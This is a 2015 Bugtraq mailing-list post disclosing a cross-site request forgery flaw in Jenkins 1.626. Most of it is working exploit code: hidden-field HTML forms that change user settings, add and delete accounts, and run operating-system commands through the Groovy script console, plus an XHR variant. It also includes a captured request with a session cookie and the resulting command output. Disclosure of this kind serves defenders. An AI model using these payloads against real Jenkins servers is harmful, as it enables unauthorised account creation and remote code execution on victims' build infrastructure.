[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Jenkins 1.626 - Cross Site Request Forgery / Code Execution
From:       smash () devilteam ! pl
Date:       2015-08-28 7:30:47
Message-ID: 201508280730.t7S7Ulc6024686 () sf01web1 ! securityfocus ! com
[Download RAW message or body]

#Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution
#Date: 27.08.15
#Affected versions: => 1.626 (current)
#Vendor: jenkins-ci.org
#Contact: smash [at] devilteam.pl
 
Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to \
hjiack the authentication of users for most request. Using CSRF it is able to change \
specific settings or even execute code on os as shown below.  
Examples:
 
<html>
  <!-- Change user descripton -->
  <body>
    <form action="http://127.0.0.1/jenkins/user/user/submitDescription" \
method="POST">  <input type="hidden" name="description" value="abc" />
      <input type="hidden" name="json" \
value="&#123;&quot;description&quot;&#58;&#32;&quot;abc&quot;&#125;" />  <input \
type="hidden" name="Submit" value="Submit" />  <input type="submit" value="Go" />
    </form>
  </body>
</html>
 
<!-- // -->
 
<html>
  <!-- Add user -->
  <body>
    <form action="http://127.0.0.1/jenkins/securityRealm/createAccountByAdmin" \
method="POST">  <input type="hidden" name="username" value="csrf" />
      <input type="hidden" name="password1" value="pass" />
      <input type="hidden" name="password2" value="pass" />
      <input type="hidden" name="fullname" value="Legit&#32;Bob" />
      <input type="hidden" name="email" value="bob&#64;mail&#46;box" />
      <input type="hidden" name="json" \
value="&#123;&quot;username&quot;&#58;&#32;&quot;csrf&quot;&#44;&#32;&quot;password1&q \
uot;&#58;&#32;&quot;pass&quot;&#44;&#32;&quot;password2&quot;&#58;&#32;&quot;pass&quot \
;&#44;&#32;&quot;fullname&quot;&#58;&#32;&quot;Legit&#32;Bob&quot;&#44;&#32;&quot;email&quot;&#58;&#32;&quot;bob&#64;mail&#46;box&quot;&#125;" \
/>  <input type="hidden" name="Submit" value="Sign&#32;up" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
 
<!-- // -->
 
<html>
  <!-- Delete user -->
  <body>
    <form action="http://127.0.0.1/jenkins/user/csrf/doDelete" method="POST">
      <input type="hidden" name="json" value="&#123;&#125;" />
      <input type="hidden" name="Submit" value="Yes" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
 
<!-- // -->
 
<html>
  <!-- Code execution #1
          groovy: print "cmd /c dir".execute().text
            -->
  <body>
    <form action="http://127.0.0.1/jenkins/script" method="POST">
      <input type="hidden" name="script" \
value="print&#32;&quot;cmd&#32;&#47;c&#32;dir&quot;&#46;execute&#40;&#41;&#46;text&#13;&#10;" \
/>  <input type="hidden" name="json" \
value="&#123;&quot;script&quot;&#58;&#32;&quot;print&#32;&#92;&quot;cmd&#32;&#47;c&#32 \
;dir&#92;&quot;&#46;execute&#40;&#41;&#46;text&#92;n&quot;&#44;&#32;&quot;&quot;&#58;&#32;&quot;&quot;&#125;" \
/>  <input type="hidden" name="Submit" value="Wykonaj" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
 
<html>
  <!-- Code execution #2
          groovy: print "cmd /c dir".execute().text
            -->
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://127.0.0.1/jenkins/computer/(master)/script", true);
        xhr.setRequestHeader("Accept", \
                "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "script=println+%22cmd+%2Fc+dir%22.execute%28%29.text&json=%7B%22sc \
ript%22%3A+%22println+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj";
  var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
  </body>
</html>
 
 
Request:
POST /jenkins/script HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/jenkins/script
Cookie: JSESSIONID=E8F948238B2F4D6DAFAF191F074E6C3E; screenResolution=1600x900
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
 
script=print+%22cmd+%2Fc+dir%22.execute%28%29.text%0D%0A&json=%7B%22script%22%3A+%22pr \
int+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%5Cn%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj
  
Response:
HTTP/1.1 200 OK
Date: Thu, 27 Aug 2015 18:06:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Expires: 0
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
X-Hudson: 1.395
X-Jenkins: 1.626
X-Jenkins-Session: 0ff3a92b
X-Hudson-CLI-Port: 1834
X-Jenkins-CLI-Port: 1834
X-Jenkins-CLI2-Port: 1834
X-Frame-Options: sameorigin
X-Instance-Identity: \
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoMa5pk8H/b/c/jIOBH+D8XGi2/1MUshSuGtK41S9ON \
67SRR1Dzmqlzhj+Hsgla6+NJDCFKqZf3aoQbgt8nVzQRkb12bjYPHMupa58SApxwIyvhRJaNq9jq+CcllEwt9m \
+N1JeCxeLork82LAbiDSBbPhHBGLzqA0a9hzKVTm80i9yiTqDoEK+WyK4m8AyqJFH/V4lkERKbSr2YK1u2sFGC \
uBaGAK/RYspmNmJSqj0c3lPEYeDsehTSn4PHpFrbsvKkHKD1RxNDRciSFMNY3RtxpBEhKxvJHkpy9HKF+ktYebwCMZ4J8LKnhkvwqJPgpqar3FuxX4Gsfwoy0/1oCtPQIDAQAB
                
X-SSH-Endpoint: 127.0.0.1:1832
Content-Type: text/html;charset=UTF-8
Content-Length: 13468
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
(...)
> <link rel='stylesheet' \
> href='/jenkins/adjuncts/0ff3a92b/org/kohsuke/stapler/codemirror/theme/default.css' \
> type='text/css' /><h2>Rezultat</h2><pre> Wolumin w stacji C to Windows7_OS
 Numer seryjny woluminu: D2DC-59F9
 
 Katalog: C:\Bitnami\jenkins-1.626-0
 
2015-08-27  18:51    <DIR>          .
2015-08-27  18:51    <DIR>          ..
2015-08-27  18:47    <DIR>          apache-tomcat
2015-08-27  18:47    <DIR>          apache2
2015-08-27  18:47    <DIR>          apps
2015-08-27  18:49             9&#65533;751 changelog.txt
2015-08-27  18:47    <DIR>          common
2015-08-27  18:48    <DIR>          git
2015-08-27  18:49    <DIR>          gradle
2015-08-27  18:47    <DIR>          img
2015-08-27  18:47    <DIR>          java
2015-08-27  18:47    <DIR>          licenses
2015-07-30  14:15         3&#65533;080&#65533;056 manager-windows.exe
2015-08-27  18:50             1&#65533;102 properties.ini
2015-08-27  18:49            12&#65533;118 README.txt
2015-08-27  18:50    <DIR>          scripts
2015-08-27  18:47             5&#65533;536 serviceinstall.bat
2015-08-27  18:47             5&#65533;724 servicerun.bat
2015-08-27  18:47    <DIR>          sqlite
2015-08-27  18:51           268&#65533;031 uninstall.dat
2015-08-27  18:51         7&#65533;038&#65533;369 uninstall.exe
2015-08-27  18:50               166 use_jenkins.bat
               9 plik(&#65533;w)         10&#65533;420&#65533;853 bajt&#65533;w
              13 katalog(&#65533;w)  110&#65533;690&#65533;426&#65533;880 \
bajt&#65533;w wolnych </pre></div>
(...)
 


[prev in list] [next in list] [prev in thread] [next in thread]